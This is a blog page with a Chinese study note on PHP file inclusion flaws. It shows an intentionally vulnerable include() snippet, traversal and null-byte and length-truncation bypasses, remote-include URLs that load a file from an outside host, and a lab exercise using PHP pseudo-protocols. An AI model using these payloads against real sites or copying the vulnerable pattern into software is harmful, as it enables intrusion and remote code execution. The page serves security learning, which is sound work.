<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Web学习 文件包含漏洞 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="文件包含 1、文件包含漏洞简介1、1什么是文件包含      程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数 时，直接调用此文件，无需再次编写，这种调用文件的过程一般被称为文件包含。 1、2 文件包含漏洞的成因            随着网站业务的需求，程序开发人员一般希望代码更灵活，所以将被包 含的文件设置为变量，用来进行动态调用，但是正是这种灵活性通过动态变量的方式引入需要">
<meta property="og:type" content="article">
<meta property="og:title" content="Web学习 文件包含漏洞">
<meta property="og:url" content="http://example.com/2022/03/16/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="文件包含 1、文件包含漏洞简介1、1什么是文件包含      程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数 时，直接调用此文件，无需再次编写，这种调用文件的过程一般被称为文件包含。 1、2 文件包含漏洞的成因            随着网站业务的需求，程序开发人员一般希望代码更灵活，所以将被包 含的文件设置为变量，用来进行动态调用，但是正是这种灵活性通过动态变量的方式引入需要">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s2.loli.net/2022/03/16/KL4v71fCHs6Vyn3.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/16/5UMa6fRHA1IETeQ.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/16/Hrg2JCAbykMcS1R.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/16/UWeKyPVLDvZEbH8.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/ANehVLMsjCRYK15.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/za12Gc4DRge7AWM.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/MQjmFY6Vlc1PDBG.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/euKrLOcW6DmSYp9.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/gj34CBEueso2SQN.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/JiyrHRaT7t4kbqV.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/qdJtRvQZz26bI84.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/QMfcirHUBoJqIXK.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/toUjdvHncDLAChk.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/xUDFEfliCq15QkA.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/DL2w8VPSEjHFz3Z.png">
<meta property="og:image" content="https://s2.loli.net/2022/03/17/JVjBeZEQdunqNzI.png">
<meta property="article:published_time" content="2022-03-16T15:39:11.539Z">
<meta property="article:modified_time" content="2022-04-08T16:50:16.318Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/03/16/KL4v71fCHs6Vyn3.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-文件包含漏洞" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2022/03/16/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" class="article-date">
  <time datetime="2022-03-16T15:39:11.539Z" itemprop="datePublished">2022-03-16</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Web学习 文件包含漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h1><p><img src="https://s2.loli.net/2022/03/16/KL4v71fCHs6Vyn3.png"><br><img src="https://s2.loli.net/2022/03/16/5UMa6fRHA1IETeQ.png"></p>
<p>1、文件包含漏洞简介<br>1、1什么是文件包含</p>
<pre><code>     程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数</code></pre>
<p>时，直接调用此文件，无需再次编写，这种调用文件的过程一般被称为文件包含。</p>
<p>1、2 文件包含漏洞的成因  </p>
<pre><code>         随着网站业务的需求，程序开发人员一般希望代码更灵活，所以将被包</code></pre>
<p>含的文件设置为变量，用来进行动态调用，但是正是这种灵活性通过动态变<br>量的方式引入需要包含的文件时，用户对这个变量可控而且服务端又没有做<br>合理的校验或者校验被绕过就造成了文件包含漏洞。</p>
<p>1、3 PHP中常见包含文件的函数</p>
<p>Ø include( )<br>当使用该函数包含文件时，只有代码执行到 include()函数时才将文件包含<br>进来，发生错误时之给出一个警告，继续向下执行。<br>Ø include_once( )<br>功能与Include()相同，区别在于当重复调用同一文件时，程序只调用一次<br>Ø require( )<br>require()与include()的区别在于require()执行如果发生错误，函数会输出<br>错误信息，并终止脚本的运行。<br>Ø require_once( )<br>功能与require()相同，区别在于当重复调用同一文件时，程序只调用一次。</p>
<p> 几乎所有的脚本语言中都提供文件包含的功能，但文件包含漏洞在 PHP 中<br>居多，而在JSP、ASP、ASP.NET程序中非常少，甚至没有包含漏洞的存在。这</p>
<p>与程序开发人员的水平无关，而问题在于语言设计的弊端。</p>
<p>2.举例说明</p>
<p>2.1</p>
<p>有1.txt文件,并且无限制</p>
<pre><code>&lt;?php
$filename=$_GET[&#39;filename&#39;];
include($filename)
?&gt;</code></pre>
<p>直接访问127.0.0.1，只能显示1.txt的代码。</p>
<p><img src="https://s2.loli.net/2022/03/16/Hrg2JCAbykMcS1R.png"></p>
<p>但是利用文件包含漏洞，就可以运行1.txt的代码</p>
<p><img src="https://s2.loli.net/2022/03/16/UWeKyPVLDvZEbH8.png"></p>
<p>2.2 </p>
<p>1.txt有限制</p>
<pre><code>&lt;?php
$filename=$_GET[&#39;filename&#39;];
include ($filename.&quot; .html&quot; );
?&gt;</code></pre>
<p>指向了文件后缀为html<br>这样1.txt就变成了 1.txt.html 这样没有这个文件，所以会执行失败</p>
<p>那么如何绕过</p>
<p>%00截断:条件: magic quotes gpc = off     php版本&lt;5.3.4</p>
<pre><code>http://127.0.0.1:8080/include.php?filename=1.txt%00</code></pre>
<p><img src="https://s2.loli.net/2022/03/17/ANehVLMsjCRYK15.png"></p>
<p>长度截断:条件: windows，点号需要长于256; linux长于4096</p>
<p>填充垃圾长度，使得.html无法被加上</p>
<p><img src="https://s2.loli.net/2022/03/17/za12Gc4DRge7AWM.png"></p>
<p>2.3跨目录包含</p>
<p><a href="http://1227.0.0.1:8080/include.php?filename=../../1.txt">http://1227.0.0.1:8080/include.php?filename=../../1.txt</a></p>
<p>3.远程包含</p>
<p><img src="https://s2.loli.net/2022/03/17/MQjmFY6Vlc1PDBG.png"></p>
<p>allow_url_include打开时支持远程包含</p>
<p>访问并执行远程文件</p>
<p><img src="https://s2.loli.net/2022/03/17/euKrLOcW6DmSYp9.png"></p>
<p>如果远程文件为后门代码，那么该代码会被执行并被连接</p>
<p>3.2有限制远程包含绕过</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1:8080/include.php?filename=http">http://127.0.0.1:8080/include.php?filename=http</a>: / / <a target="_blank" rel="noopener" href="http://www.xiaodi8.com/readme.txt">www.xiaodi8.com/readme.txt</a></p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1:8080/include.php?filename=http">http://127.0.0.1:8080/include.php?filename=http</a> :/ / <a target="_blank" rel="noopener" href="http://www.xiaodi8.com/readme.txt%20">www.xiaodi8.com/readme.txt%20</a></p>
<p>http: //127.0.0.1:8080/include.php?filename=http: // <a target="_blank" rel="noopener" href="http://www.xiaodi8.com/readme.txt%23">www.xiaodi8.com/readme.txt%23</a></p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1:8080/include.php?filename=http">http://127.0.0.1:8080/include.php?filename=http</a> : / / <a target="_blank" rel="noopener" href="http://www.xiaodi8.com/readme.txt">www.xiaodi8.com/readme.txt</a>?</p>
<p>4.利用协议</p>
<p><img src="https://s2.loli.net/2022/03/17/gj34CBEueso2SQN.png"><br><img src="https://s2.loli.net/2022/03/17/JiyrHRaT7t4kbqV.png"></p>
<p><img src="https://s2.loli.net/2022/03/17/qdJtRvQZz26bI84.png"></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/endust/p/11804767.html">各种php伪协议的用法</a></p>
<p><img src="https://s2.loli.net/2022/03/17/QMfcirHUBoJqIXK.png"></p>
<p>5.靶场训练</p>
<p>无论直接访问还是利用参数访问，都执行了页面代码。也可根据页面代码发现存在文件包含漏洞</p>
<p><img src="https://s2.loli.net/2022/03/17/toUjdvHncDLAChk.png"><br><img src="https://s2.loli.net/2022/03/17/xUDFEfliCq15QkA.png"></p>
<p>利用php伪协议查看目录</p>
<p><img src="https://s2.loli.net/2022/03/17/DL2w8VPSEjHFz3Z.png"></p>
<p>利用php伪协议查看文件，查看源代码</p>
<p><img src="https://s2.loli.net/2022/03/17/JVjBeZEQdunqNzI.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/03/16/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" data-id="cl13rha6v0001gsv86a6u5lrs" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/03/21/BUUCTF%E7%AC%AC%E4%BA%8C%E9%A1%B5/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          buuctf&amp;&amp;攻防世界
        
      </div>
    </a>
  
  
    <a href="/2022/03/16/tcathe_%E4%BF%AE%E6%94%B9fd/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">tcache结构体</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/08/">August 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">November 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">October 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/09/">September 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/08/">August 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">January 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">December 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/08/10/22.8.10xctf-pwn&re/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/04/07/%E8%BF%9C%E6%8E%A7ghost/">记第一个GitHub项目 --ghost远控</a>
          </li>
        
          <li>
            <a href="/2022/03/21/BUUCTF%E7%AC%AC%E4%BA%8C%E9%A1%B5/">buuctf&amp;&amp;攻防世界</a>
          </li>
        
          <li>
            <a href="/2022/03/16/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/">Web学习 文件包含漏洞</a>
          </li>
        
          <li>
            <a href="/2022/03/16/tcathe_%E4%BF%AE%E6%94%B9fd/">tcache结构体</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>